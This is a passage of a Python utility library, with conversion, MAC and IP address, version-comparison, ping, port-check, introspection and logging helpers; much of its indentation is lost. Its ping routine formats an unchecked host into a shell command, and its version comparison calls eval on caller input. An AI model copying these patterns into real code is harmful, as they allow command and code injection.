#elif isinstance(src,unicode): # type(self.src).__name__ == 'unicode':
elif Type(src,'unicode'):
return src.encode(encode)
#return '''{}'''.format(src)
if default =='org' or default == {'org'}:
return src
return default
tuple_data=False
if isinstance(self.src,tuple):
self.src=list(self.src)
tuple_data=True
if isinstance(self.src,list):
for i in range(0,len(self.src)):
self.src[i]=_byte2str_(self.src[i],encode,default)
if tuple_data:
return tuple(self.src)
else:
return self.src
else:
return _byte2str_(self.src,encode,default)
def Str2Int(self,encode='utf-8'):
if PyVer(3):
if isinstance(self.src,bytes):
return int(self.src.hex(),16)
else:
return int(self.Bytes(encode=encode).hex(),16)
return int(self.src.encode('hex'),16)
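# Usage sketch for BYTES (str<->bytes conversion that tolerates mixed containers):
#   >>> BYTES('abc').Bytes()
#   b'abc'
#   >>> BYTES(b'abc').Str()
#   'abc'
#   >>> BYTES(('a', b'b')).Bytes()
#   (b'a', b'b')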
class CONVERT:
def __init__(self,src):
self.src=src
def Int(self,default=False):
if isinstance(self.src,int): return self.src
if Type(self.src,('float','long','str')):
try:return int(self.src)
except: pass
if default == 'org' or default == {'org'}: return self.src
return default
def Str(self,default='org'):
if isinstance(self.src,bytes):
return BYTES(self.src).Str()
else:
try:
return '{}'.format(self.src)
except:
if default == 'org' or default == {'org'}: return self.src
return default
def Ast(self,default=False,want_type=None):
if isinstance(self.src,str):
try:
return ast.literal_eval(self.src)
except:
if default == 'org' or default == {'org'}:
return self.src
return default
if want_type:
if isinstance(self.src,want_type):
return self.src
if default == 'org' or default == {'org'}:
return self.src
return default
def Form(self,default=False):
return self.Ast(default=default)
def Json(self,src=None,default=None):
if src is None: src=self.src
try:
return _json.loads(src)
except:
return default
def Mac2Str(self,case='lower',default=False):
if MAC(self.src).IsV4():
if case == 'lower':
self.src=self.src.strip().replace(':','').replace('-','').lower()
else:
self.src=self.src.strip().replace(':','').replace('-','').upper()
return self.src
return default
def Str2Mac(self,case='lower',default=False,sym=':',chk=False):
if isinstance(self.src, str):
self.src=self.src.strip()
if len(self.src) in [12,17]:
self.src=self.src.replace(':','').replace('-','')
if len(self.src) == 12:
self.src=sym.join(self.src[i:i+2] for i in range(0,12,2))
if case == 'lower':
self.src=self.src.lower()
else:
self.src=self.src.upper()
if chk:
if not MAC(self.src).IsV4():
return default
return self.src
def Size(self,unit='b:g',default=False):
try:
self.src=int(self.src)
except:
return default
unit_a=unit.lower().split(':')
if len(unit_a) != 2:
return False
def inc(sz):
return '%.1f'%(float(sz) / 1024)
def dec(sz):
return int(sz) * 1024
sunit=unit_a[0]
eunit=unit_a[1]
unit_m=['b','k','m','g','t','p']
si=unit_m.index(sunit)
ei=unit_m.index(eunit)
h=ei-si
for i in range(0,abs(h)):
if h > 0:
self.src=inc(self.src)
else:
self.src=dec(self.src)
return self.src
def Url(self):
if isinstance(self.src,str):
return self.src.replace('+','%2B').replace('?','%3F').replace('/','%2F').replace(':','%3A').replace('=','%3D').replace(' ','+')
return self.src
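# Usage sketch for CONVERT (Size walks the unit ladder 'b','k','m','g','t','p'):
#   >>> CONVERT(2147483648).Size(unit='b:g')    # bytes -> gigabytes
#   '2.0'
#   >>> CONVERT('AA-BB-CC-DD-EE-FF').Str2Mac()
#   'aa:bb:cc:dd:ee:ff'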
class MAC:
def __init__(self,src=None):
self.src=src
def IsV4(self,**opts):
symbol=opts.get('symbol',':')
default=opts.get('default',False)
if isinstance(self.src,str):
self.src=self.src.strip()
# make sure the format
if 12 <= len(self.src) <= 17:
for i in [':','-']:
self.src=self.src.replace(i,'')
self.src=symbol.join(self.src[i:i+2] for i in range(0,12,2))
# Check the normal mac format
octets = self.src.split(symbol)
if len(octets) != 6: return False
for i in octets:
try:
if len(i) != 2 or int(i, 16) > 255:
return False
except:
return False
return True
return default
def FromStr(self,case='lower',default=False,sym=':',chk=False):
if isinstance(self.src, str):
self.src=self.src.strip()
if len(self.src) in [12,17]:
self.src=self.src.replace(':','').replace('-','')
if len(self.src) == 12:
self.src=sym.join(self.src[i:i+2] for i in range(0,12,2))
if case == 'lower':
self.src=self.src.lower()
else:
self.src=self.src.upper()
if chk:
if not self.IsV4():
return default
return self.src
def ToStr(self,case='lower',default=False):
if self.IsV4():
if case == 'lower':
self.src=self.src.strip().replace(':','').replace('-','').lower()
else:
self.src=self.src.strip().replace(':','').replace('-','').upper()
return self.src
return default
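# Usage sketch for MAC (format check plus canonicalization):
#   >>> MAC('AABBCCDDEEFF').IsV4()
#   True
#   >>> MAC('AABBCCDDEEFF').FromStr()
#   'aa:bb:cc:dd:ee:ff'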
class VERSION:
def __init__(self):
pass
def Clear(self,string,sym='.'):
if isinstance(string,(int,str,float)) and string:
if isinstance(string,str):
string=string.strip()
else:
string='{}'.format(string)
arr=string.split(sym)
for ii in range(len(arr)-1,0,-1):
if arr[ii].replace('0','') == '':
arr.pop(-1)
else:
break
return sym.join(arr)
return False
def Check(self,a,sym,b):
a=self.Clear(a)
b=self.Clear(b)
if a is False or b is False:
return False
if sym == '>':
if LooseVersion(a) > LooseVersion(b):
return True
elif sym == '>=':
if LooseVersion(a) >= LooseVersion(b):
return True
elif sym == '==':
if LooseVersion(a) == LooseVersion(b):
return True
elif sym == '<=':
if LooseVersion(a) <= LooseVersion(b):
return True
elif sym == '<':
if LooseVersion(a) < LooseVersion(b):
return True
return False
def Compare(self,src,compare_symbol,dest,compare_range='dest',version_symbol='.'):
if isinstance(src,dict): src=src.get('version')
if isinstance(dest,dict): dest=dest.get('version')
if isinstance(src,str):
src=STR(src).Split(version_symbol)
elif isinstance(src,tuple):
src=list(src)
if isinstance(dest,str):
dest=STR(dest).Split(version_symbol)
elif isinstance(dest,tuple):
dest=list(dest)
src=[ Int(i) for i in src]
dest=[ Int(i) for i in dest]
if compare_range == 'dest':
src=src[:len(dest)]
elif compare_range == 'src':
dest=dest[:len(src)]
elif isinstance(compare_range,(tuple,list)) and len(compare_range) == 2:
if isinstance(compare_range[0],int) and isinstance(compare_range[1],int):
src=src[compare_range[0]:compare_range[1]]
dest=dest[compare_range[0]:compare_range[1]]
elif not compare_range[0] and isinstance(compare_range[1],int):
src=src[:compare_range[1]]
dest=dest[:compare_range[1]]
elif isinstance(compare_range[0],int) and not compare_range[1]:
src=src[compare_range[0]:]
dest=dest[compare_range[0]:]
elif isinstance(compare_range,int):
if len(src) > compare_range and len(dest) > compare_range:
src=src[compare_range]
dest=dest[compare_range]
else:
return
return eval('{} {} {}'.format(src,compare_symbol,dest))
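# Usage sketch for VERSION (Clear drops trailing zero fields before comparing):
#   >>> VERSION().Check('1.2.0', '==', '1.2')
#   True
#   >>> VERSION().Compare('1.2.9', '<', '1.10', compare_range='dest')
#   True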
def is_cancel(func):
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func():
return True
elif ttt in ['bool','str'] and func in [True,'cancel']:
return True
return False
class IP:
def __init__(self,ip=None):
self.ip=ip
def IsV4(self,ip=None):
if not ip: ip=self.ip
if self.V4(ip,default=False) is False: return False
return True
def IsBmcIp(self,ip=None,port=(623,664,443)):
return self.IsOpenPort(port,ip=ip)
def IsOpenPort(self,port,**opts):
        '''
        Check whether a connectable service (ssh, ftp, telnet, web, ...) listens on the port.
        '''
        default=opts.get('default',False)
        ip=opts.get('ip')
        if not ip:
            ip=self.ip
        if self.IsV4(ip) is False or not isinstance(port,(str,int,list,tuple)):
            return default
        if isinstance(port,(str,int)):
            try:
                port=[int(port)]
            except:
                return default
        for pt in port:
            # use a fresh socket per attempt; a closed or failed socket cannot be reconnected
            tcp_sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tcp_sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            tcp_sk.settimeout(1)
            try:
                tcp_sk.connect((ip,pt))
                tcp_sk.close()
                return True
            except:
                tcp_sk.close()
        return False
def IsUsedPort(self,port,ip=None):
if ip is None:
ip=self.ip
if ip in ['localhost','local',None]:
ip='127.0.0.1'
        # Check whether the IP currently has the port in use (open or dedicated).
soc=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
location=(ip,int(port))
rc=soc.connect_ex(location)
soc.close()
if rc== 0:
return True
return False
def Ip2Num(self,ip=None,default=False):
if not ip: ip=self.ip
return self.V4(ip,out=int,default=default)
def Ip2Str(self,ip=None,default=False):
if not ip:ip=self.ip
return self.V4(ip,out=str,default=default)
def Ip2hex(self,ip=None,default=False):
if not ip: ip=self.ip
return self.V4(ip,out=hex,default=default)
def InRange(self,start_ip,end_ip,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
startip=self.Ip2Num(start_ip)
myip=self.Ip2Num(ip)
endip=self.Ip2Num(end_ip)
if isinstance(startip,int) and isinstance(myip,int) and isinstance(endip,int):
if startip <= myip <= endip: return True
return False
return default
def LostNetwork(self,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
timeout_sec=opts.get('timeout',1800)
interval=opts.get('interval',2)
keep_good=opts.get('keep_good',30)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
if self.IsV4(ip):
if not self.Ping(ip,count=5):
if not self.Ping(ip,count=0,timeout=timeout_sec,keep_good=keep_good,interval=interval,cancel_func=cancel_func,log=log):
return True
return False
return default
def V4(self,ip=None,out='str',default=False):
if ip is None: ip=self.ip
ip_int=None
if isinstance(ip,str):
ipstr=ip.strip()
if '0x' in ipstr:
ip_int=int(ipstr,16)
elif ipstr.isdigit():
ip_int=int(ipstr)
elif '.' in ipstr:
try:
ip_int=struct.unpack("!I", socket.inet_aton(ipstr))[0] # convert Int IP
#struct.unpack("!L", socket.inet_aton(ip))[0]
except:
return default
elif isinstance(ip,int):
try:
socket.inet_ntoa(struct.pack("!I", ip)) # check int is IP or not
ip_int=ip
except:
return default
elif isinstance(ip,type(hex)):
ip_int=int(ip,16)
if ip_int is not None:
try:
if out in ['str',str]:
return socket.inet_ntoa(struct.pack("!I", ip_int))
elif out in ['int',int]:
return ip_int
elif out in ['hex',hex]:
return hex(ip_int)
except:
pass
return default
def Online(self,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
timeout_sec=opts.get('timeout',1800)
interval=opts.get('interval',3)
keep=opts.get('keep',20)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
time=TIME()
run_time=time.Int()
if self.IsV4(ip):
if log:
log('[',direct=True,log_level=1)
while True:
if time.Out(timeout_sec):
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout monitor'
if is_cancel(cancel_func):
if log:
log(']\n',direct=True,log_level=1)
return True,'Stopped monitor by Custom'
if self.Ping(ip,cancel_func=cancel_func):
if (time.Int() - run_time) > keep:
if log:
log(']\n',direct=True,log_level=1)
return True,'OK'
if log:
log('-',direct=True,log_level=1)
else:
run_time=time.Int()
if log:
log('.',direct=True,log_level=1)
time.Sleep(interval)
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout/Unknown issue'
return default,'IP format error'
def Ping(self,host=None,count=0,interval=1,keep_good=0, timeout=0,lost_mon=False,log=None,stop_func=None,log_format='.',cancel_func=None):
if host is None: host=self.ip
ICMP_ECHO_REQUEST = 8 # Seems to be the same on Solaris. From /usr/include/linux/icmp.h;
ICMP_CODE = socket.getprotobyname('icmp')
ERROR_DESCR = {
1: ' - Note that ICMP messages can only be '
'sent from processes running as root.',
10013: ' - Note that ICMP messages can only be sent by'
' users or processes with administrator rights.'
}
def checksum(msg):
sum = 0
size = (len(msg) // 2) * 2
for c in range(0,size, 2):
sum = (sum + ord(msg[c + 1])*256+ord(msg[c])) & 0xffffffff
if size < len(msg):
sum = (sum+ord(msg[len(msg) - 1])) & 0xffffffff
ra = ~((sum >> 16) + (sum & 0xffff) + (sum >> 16)) & 0xffff
ra = ra >> 8 | (ra << 8 & 0xff00)
return ra
def mk_packet(size):
"""Make a new echo request packet according to size"""
# Header is type (8), code (8), checksum (16), id (16), sequence (16)
header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, 0, size, 1)
#data = struct.calcsize('bbHHh') * 'Q'
data = size * 'Q'
my_checksum = checksum(CONVERT(header).Str() + data)
header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0,
socket.htons(my_checksum), size, 1)
return header + BYTES().From(data)
def receive(my_socket, ssize, stime, timeout):
while True:
if timeout <= 0:
return
ready = select.select([my_socket], [], [], timeout)
if ready[0] == []: # Timeout
return
received_time = time.time()
packet, addr = my_socket.recvfrom(1024)
type, code, checksum, gsize, seq = struct.unpack('bbHHh', packet[20:28]) # Get Header
if gsize == ssize:
return received_time - stime
timeout -= received_time - stime
def pinging(ip,timeout=1,size=64):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, ICMP_CODE)
except socket.error as e:
if e.errno in ERROR_DESCR:
raise socket.error(''.join((e.args[1], ERROR_DESCR[e.errno])))
raise
if size in ['rnd','random']:
# Maximum size for an unsigned short int c object(65535)
size = int((id(timeout) * random.random()) % 65535)
packet = mk_packet(size)
while packet:
sent = my_socket.sendto(packet, (ip, 1)) # ICMP have no port, So just put dummy port 1
packet = packet[sent:]
delay = receive(my_socket, size, TIME().Time(), timeout)
my_socket.close()
if delay:
return delay,size
def do_ping(ip,timeout=1,size=64,count=None,interval=0.7,log_format='ping',cancel_func=None):
ok=1
i=1
while True:
if is_cancel(cancel_func):
return -1,'canceled'
delay=pinging(ip,timeout,size)
if delay:
ok=0
if log_format == '.':
sys.stdout.write('.')
sys.stdout.flush()
elif log_format == 'ping':
sys.stdout.write('{} bytes from {}: icmp_seq={} ttl={} time={} ms\n'.format(delay[1],ip,i,size,round(delay[0]*1000.0,4)))
sys.stdout.flush()
else:
ok=1
if log_format == '.':
sys.stdout.write('x')
sys.stdout.flush()
elif log_format == 'ping':
sys.stdout.write('{} icmp_seq={} timeout ({} second)\n'.format(ip,i,timeout))
sys.stdout.flush()
if count:
count-=1
if count < 1:
return ok,'{} is alive'.format(ip)
i+=1
TIME().Sleep(interval)
if log_format=='ping':
if not count: count=1
if find_executable('ping'):
os.system("ping -c {0} {1}".format(count,host))
else:
do_ping(host,timeout=timeout,size=64,count=count,log_format='ping',cancel_func=cancel_func)
else:
Time=TIME()
init_sec=0
infinit=False
if not count and not timeout:
count=1
infinit=True
if not infinit and not count:
init_sec=Time.Init()
if keep_good and keep_good > timeout:
timeout=keep_good + timeout
count=timeout
chk_sec=Time.Init()
log_type=type(log).__name__
found_lost=False
good=False
while count > 0:
                if is_cancel(cancel_func):
                    if log_type == 'function':
                        log(' - Canceled ping')
                    return False
                # stop_func is treated as a cancel-style callable/flag here (assumption)
                if is_cancel(stop_func):
                    if log_type == 'function':
                        log(' - Stopped ping')
                    return False
if find_executable('ping'):
rc=SHELL().Run("ping -c 1 {}".format(host))
else:
rc=do_ping(host,timeout=1,size=64,count=1,log_format=None)
if rc[0] == 0:
good=True
if keep_good:
if good and keep_good and TIME().Now(int) - chk_sec >= keep_good:
return True
else:
return True
if log_type == 'function':
log('.',direct=True,log_level=1)
else:
sys.stdout.write('.')
sys.stdout.flush()
else:
good=False
chk_sec=TIME().Now(int)
if log_type == 'function':
log('x',direct=True,log_level=1)
else:
sys.stdout.write('.')
sys.stdout.flush()
if init_sec:
count=count-(TIME().Now(int)-init_sec)
elif not infinit:
count-=1
TIME().Sleep(interval)
return good
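# Usage sketch for IP (dotted-quad <-> int conversion and range checks):
#   >>> IP('192.168.1.10').Ip2Num()
#   3232235786
#   >>> IP(3232235786).Ip2Str()
#   '192.168.1.10'
#   >>> IP('10.0.0.5').InRange('10.0.0.1', '10.0.0.9')
#   True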
class GET:
def __init__(self,src=None,**opts):
self.src=src
def __repr__(self):
if self.src is None: return repr(self.MyAddr())
if Type(self.src,('instance','classobj')):
def method_in_class(class_name):
ret=dir(class_name)
if hasattr(class_name,'__bases__'):
for base in class_name.__bases__:
ret=ret+method_in_class(base)
                return ret
return repr(method_in_class(self.src))
elif Type(self.src,'dict'):
return repr(list(self.src.keys()))
elif Type(self.src,('str','list','tuple')):
return repr(len(self.src))
else:
#return repr(type(self.src).__name__)
return repr(self.src)
def MyAddr(self):
return hex(id(self))
def Index(self,*find,**opts):
default=opts.get('default',None)
err=opts.get('err',False)
out=opts.get('out',None)
rt=[]
if Type(self.src,(list,tuple,str)):
for ff in find:
if ff in self.src: rt.append(self.src.index(ff))
elif Type(self.src,dict):
for i in self.src:
for ff in find:
                    if ff == self.src[i]: rt.append(i)
if rt: return OutFormat(rt,out=out)
if err == {'org'}: return self.src
return OutFormat(default,out=out)
def Value(self,*find,**opts):
default=opts.get('default',None)
err=opts.get('err',False)
out=opts.get('out',None)
check=opts.get('check',('str','list','tuple','dict','instance','classobj'))
rt=[]
src_name=type(self.src).__name__
if len(find) == 0:
if src_name in ['kDict','kList','DICT']: return self.src.Get()
if Type(self.src,('instance','classobj')):
def method_in_class(class_name):
ret=dir(class_name)
if hasattr(class_name,'__bases__'):
for base in class_name.__bases__:
ret=ret+method_in_class(base)
return ret
return method_in_class(self.src)
elif Type(self.src,tuple(check)):
# Support
if Type(self.src,(list,tuple,str)):
if src_name in ['kList']: self.src=self.src.Get()
for ff in Abs(*find,obj=self.src,out=list,default=None,err=err):
if ff is None:
if err in [True,'True','err']: rt.append(default)
else:
rt.append(self.src[ff])
elif Type(self.src,dict):
if src_name in ['kDict','DICT']: self.src=self.src.Get()
for ff in find:
gval=self.src.get(ff,default)
if gval == default:
if err in [True,'True','err']: rt.append(gval)
else:
rt.append(gval)
elif Type(self.src,('instance','classobj')):
# get function object of finding string name in the class/instance
for ff in find:
if isinstance(ff,(list,tuple,dict)):
for kk in ff:
rt.append(getattr(self.src,kk,default))
elif isinstance(ff,str):
rt.append(getattr(self.src,ff,default))
if rt: return OutFormat(rt,out=out)
# Not support format or if not class/instance then return error
        if err in [True,'True','true','err','ERR','ERROR','error']: return OutFormat(default,out=out)
return OutFormat(self.src,out=out)
def Read(self,default=False):
if Is(self.src).Pickle():
try:
with open(self.src,'rb') as handle:
return pickle.load(handle)
except:
pass
elif os.path.isfile(self.src):
return FILE().Get(self.src)
return default
def Args(self,field='all',default={}):
rt={}
        if Type(self.src,('classobj','instance')):
try:
self.src=getattr(self.src,'__init__')
except:
return self.src.__dict__
elif not Type(self.src,'function'):
return default
        args, varargs, keywords, defaults = inspect.getfullargspec(self.src)[:4]  # getargspec was removed in Python 3.11
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rt['defaults']=defaults
if args:
rt['args']=args
if varargs:
rt['varargs']=varargs
if keywords:
            rt['keywords']=keywords
if Type(field,(list,tuple)):
rts=[]
for ii in field:
rts.append(rt.get(ii,default))
return rts
else:
if field in ['*','all']:
return rt
if field in rt:
return rt[field]
return default
def ArgType(self,arg,want='_',get_data=['_']):
type_arg=type(arg)
if want in get_data:
if type_arg.__name__ == 'Request':
return arg.method.lower()
return type_arg.__name__.lower()
if Type(want,str):
if type_arg.__name__ == 'Request':
if want.upper() == 'REQUEST' or want.upper() == arg.method:
return True
return False
else:
if type_arg.__name__.lower() == want.lower():
return True
else:
if type_arg == want:
return True
return False
def FuncList(self):
rt={}
if Type(self.src,'instance'):
self.src=self.src.__class__
if Type(self.src,('classobj','module')):
for name,fobj in inspect.getmembers(self.src):
if Type(fobj,('function','instancemethod')):
rt.update({name:fobj})
return rt
def FunctionList(self):
return self.FuncList()
def Func(self,name,default=None):
funcList=self.FuncList()
if isinstance(name,str):
if name in funcList: return funcList[name]
        elif Type(name,('function','instancemethod')):
return name
return default
def Function(self,name,default=None):
return self.Func(name,default=default)
def FuncName(self,default=False,detail=False):
#return traceback.extract_stack(None, 2)[0][2]
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return default
def FunctionName(self,default=False,detail=False):
return self.FuncName(default=default,detail=detail)
def ParentName(self):
return traceback.extract_stack(None, 3)[0][2]
def Class(self,default=None):
if Type(self.src,'instance'):
return self.src.__class__
elif Type(self.src,'classobj'):
return self.src
else:
return default
def ClassName(self,default=None):
if Type(self.src,'instance'):
return self.src.__class__.__name__
elif Type(self.src,'classobj'):
return self.src.__name__
else:
return default
def DirName(self,default=None):
if Type(self.src,str):
dirname=os.path.dirname(self.src)
if dirname == '': return '.'
return dirname
return default
def DirectoryName(self,default=None):
return self.DirName(default=default)
def Pwd(self):
#return os.path.abspath(__file__)
return os.path.dirname(os.path.realpath(__file__))
def Basename(self):
if Type(self.src,str): return os.path.basename(self.src)
return __file__
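# Usage sketch for GET (uniform accessor over sequences, dicts and objects):
#   >>> GET([10, 20, 30]).Value(-1, out='raw')
#   30
#   >>> GET({'a': 1}).Value('a', out='raw')
#   1
#   >>> GET('abc').Index('b', out='raw')
#   1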
class IS:
def __init__(self,src=None,**opts):
self.src=src
self.rtd=opts.get('rtd',{'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],'FAIL':[False,'False','Fail',{'FAL'}],'NONE':[None,'None','N/A',{'NA'}],'IGNO':['IGNO','Ignore',{'IGN'}],'ERRO':['ERR','Error',{'ERR'}],'WARN':['Warn',{'WAR'}],'UNKN':['Unknown','UNKN',{'UNK'}],'JUMP':['Jump',{'JUMP'}]})
def Py2(self):
if PyVer(2): return True
return False
def Py3(self):
if PyVer(3): return True
return False
def Int(self):
try:
int(self.src)
return True
except:
return False
def Ipv4(self):
return IP(self.src).IsV4()
def Mac4(self,**opts):
return MAC(self.src).IsV4()
    def Ip_with_port(self,port,**opts):
        # IP defines no WithPort(); IsOpenPort() is the closest existing check (assumption)
        return IP(self.src).IsOpenPort(port,**opts)
def File(self):
if isinstance(self.src,str): return os.path.isfile(self.src)
return False
def Dir(self):
if isinstance(self.src,str): return os.path.isdir(self.src)
return False
def Xml(self):
firstLine=file_rw(self.src,out='string',read='firstline')
if firstLine is False:
#filename_str=_u_byte2str(self.src)
filename_str=CONVERT(self.src).Str()
if isinstance(filename_str,str):
firstLine=filename_str.split('\n')[0]
if isinstance(firstLine,str) and firstLine.split(' ')[0] == '<?xml': return True
return False
def Json(self,src=None):
if src is None: src=self.src
try:
_json.loads(self.src)
return True
except:
return False
def Pickle(self):
if isinstance(self.src,str) and os.path.isfile(self.src):
try:
with open(self.src,'rb') as f: # Pickle Type
pickle.load(f)
return True
except:
pass
return False
def Matrix(self,**opts):
default=opts.get('default',False)
if isinstance(self.src,(tuple,list)) and len(self.src) >= 1:
if isinstance(self.src[0],(tuple,list)): # |a,b,c|
first_ln=len(self.src[0]) # |d,e,f|
for ii in self.src[1:]:
if isinstance(ii,(tuple,list)) and len(ii) == first_ln: continue
return False
return True
else: # |a,b,c,d|
                first_type=type(self.src[0])
                for ii in self.src[1:]:
                    if type(ii) != first_type: return False
return True
return default
def Lost_network(self,**opts):
return IP(self.src).LostNetwork(**opts)
def Comback_network(self,**opts):
return IP(self.src).Online(**opts)
def Rc(self,chk='_'):
def trans(irt):
type_irt=type(irt)
            for ii in self.rtd:
                for jj in self.rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(self.src,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if trans(chk) == nrtc:
return True
return False
return nrtc
def Cancel(self,func=None):
if func is None:
func=self.src
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func():
return True
elif ttt in ['bool','str'] and func in [True,'cancel']:
return True
return False
def Window(self):
return False
def Android(self):
return False
def IOS(self):
return False
def Centos(self):
return False
def Unbuntu(self):
return False
def Suse(self):
return False
def Linux(self):
        if self.Centos() or self.Unbuntu() or self.Suse(): return True
return False
def Function(self,obj=None,default=False):
if Type(self.src,'function'): return True
if obj is None:
            obj=sys.modules.get('__main__',default)
elif isinstance(obj,str):
obj=sys.modules.get(obj,default)
if obj == default: return default
if Type(obj,'Class','module'):
if GET(obj).FuncList().get(self.src,default) == default: return default
return True
#return vars(obj).get(self.src,default)
return default
def Var(self,obj=None,default=False):
if obj is None:
obj=sys.modules.get('__main__',default)
elif isinstance(obj,str):
obj=sys.modules.get(obj,default)
if obj == default: return default
if Type(obj,'class','function','instance'):
ARGS=GET(obj).Args()
for tt in ARGS:
if self.src in ARGS[tt]: return True
else:
get_var=dict(inspect.getmembers(inspect.stack()[1][0]))["f_globals"].get(self.src,'_#_')
if get_var != '_#_':
if not Type(get_var,'module','class','function'): return True
# if hasattr(obj,self.src):
# return True
return False
def Exec(self):
if isinstance(self.src,str):
if find_executable(self.src):
return True
return False
def Bin(self):
return self.Exec()
def Same(self,src=None,chk_val=None,sense=False):
def _IsSame_(src,chk,sense):
src_type=type(src).__name__
chk_type=type(chk).__name__
if src_type == 'bytes' or chk_type == 'bytes':
if chk_type=='int': chk='{}'.format(chk)
if isinstance(chk,str):
chk=BYTES().From(chk)
if not sense:
chk=chk.lower()
if src_type=='int': src='{}'.format(src)
if isinstance(src,str):
src=BYTES().From(src)
if not sense:
src=src.lower()
if src == chk: return True
else:
if src_type == 'str' and src.isdigit(): src=int(src)
if chk_type == 'str' and chk.isdigit(): chk=int(chk)
if not sense and isinstance(src,str) and isinstance(chk,str):
if src.lower() == chk.lower(): return True
elif src == chk:
return True
return False
if isinstance(src,(list,tuple)) and isinstance(chk_val,(list,tuple)):
for j in src:
ok=False
for i in chk_val:
aa=_IsSame_(j,i,sense)
if aa is True:
ok=True
break
if ok is False: return False
for j in chk_val:
ok=False
for i in src:
aa=_IsSame_(j,i,sense)
if aa is True:
ok=True
break
if ok is False: return False
return True
else:
if isinstance(chk_val,(list,tuple)):
for i in chk_val:
aa=_IsSame_(src,i,sense)
if aa is True: return True
return False
else:
return _IsSame_(src,chk_val,sense)
class LOG:
def __init__(self,**opts):
self.limit=opts.get('limit',3)
self.dbg_level=opts.get('dbg_level',None)
self.path=opts.get('path','/tmp')
self.log_file=opts.get('log_file',None)
self.info_file=opts.get('info_file',None)
self.error_file=opts.get('error_file',None)
self.dbg_file=opts.get('dbg_file',None)
self.screen=opts.get('screen',False)
self.date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
def Format(self,*msg,**opts):
log_date_format=opts.get('date_format',self.date_format)
func_name=opts.get('func_name',None)
end_new_line=opts.get('end_new_line','')
start_new_line=opts.get('start_new_line','\n')
if len(msg) > 0:
m_str=None
intro=''
intro_space=''
if log_date_format:
intro=TIME().Format(tformat=log_date_format)+' '
func_name_name=type(func_name).__name__
if func_name_name == 'str':
intro=intro+'{0} '.format(func_name)
elif func_name is True:
intro=intro+'{0}() '.format(get_caller_fcuntion_name())
elif func_name_name in ['function','instancemethod']:
intro=intro+'{0}() '.format(func_name.__name__)
if intro:
for i in range(0,len(intro)):
intro_space=intro_space+' '
for m in list(msg):
n=m.split('\n')
if m_str is None:
m_str='{0}{1}{2}{3}'.format(start_new_line,intro,n[0],end_new_line)
else:
m_str='{0}{1}{2}{3}{4}'.format(m_str,start_new_line,intro_space,n[0],end_new_line)
for nn in n[1:]:
m_str='{0}{1}{2}{3}{4}'.format(m_str,start_new_line,intro_space,nn,end_new_line)
return m_str
def Syslogd(self,*msg,**opts):
syslogd=opts.get('syslogd',None)
if syslogd:
syslog_msg=' '.join(msg)
if syslogd in ['INFO','info']:
syslog.syslog(syslog.LOG_INFO,syslog_msg)
elif syslogd in ['KERN','kern']:
syslog.syslog(syslog.LOG_KERN,syslog_msg)
elif syslogd in ['ERR','err']:
syslog.syslog(syslog.LOG_ERR,syslog_msg)
elif syslogd in ['CRIT','crit']:
syslog.syslog(syslog.LOG_CRIT,syslog_msg)
elif syslogd in ['WARN','warn']:
syslog.syslog(syslog.LOG_WARNING,syslog_msg)
elif syslogd in ['DBG','DEBUG','dbg','debug']:
syslog.syslog(syslog.LOG_DEBUG,syslog_msg)
else:
syslog.syslog(syslog_msg)
def File(self,log_str,log_level,special_file=None):
log_file=None
if os.path.isdir(self.path):
if (log_level in ['dbg','debug'] or (isinstance(log_level,int) and isinstance(self.dbg_level,int) and self.dbg_level <= log_level <= self.limit)) and isinstance(self.dbg_file,str):
log_file=os.path.join(self.path,self.dbg_file)
elif log_level in ['info'] and isinstance(self.info_file,str):
log_file=os.path.join(self.path,self.info_file)
elif log_level in ['error'] and isinstance(self.error_file,str):
log_file=os.path.join(self.path,self.error_file)
elif isinstance(self.log_file,str) or isinstance(special_file,str):
if special_file:
log_file=os.path.join(self.path,special_file)
elif log_level in ['dbg','debug','info','error'] or (isinstance(log_level,int) and log_level <= self.limit):
log_file=os.path.join(self.path,self.log_file)
if log_file:
with open(log_file,'a+') as f:
f.write(log_str)
return log_file
def Screen(self,log_str,log_level):
if log_level in ['error']:
sys.stderr.write(log_str)
sys.stderr.flush()
elif log_level <= self.limit:
sys.stdout.write(log_str)
sys.stdout.flush()
def Log(self,*msg,**opts):
direct=opts.get('direct',False)
func_name=opts.get('func_name',None)
date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
start_new_line=opts.get('start_new_line','\n')
end_new_line=opts.get('end_new_line','')
log_level=opts.get('log_level',3)
special_file=opts.get('filename',None)
screen=opts.get('screen',None)
syslogd=opts.get('syslogd',None)
if msg:
# send log at syslogd
self.Syslogd(*msg,syslogd=syslogd)
if date_format in [False,None,'','no','ignore']:
date_format=None
if func_name in [False,None,'','no','ignore']:
func_name=None
if direct:
log_str=' '.join(msg)
else:
log_str=self.Format(*msg,func_name=func_name,date_format=date_format,end_new_line=end_new_line,start_new_line=start_new_line)
# Saving log at file
log_file=self.File(log_str,log_level,special_file=special_file)
# print at screen
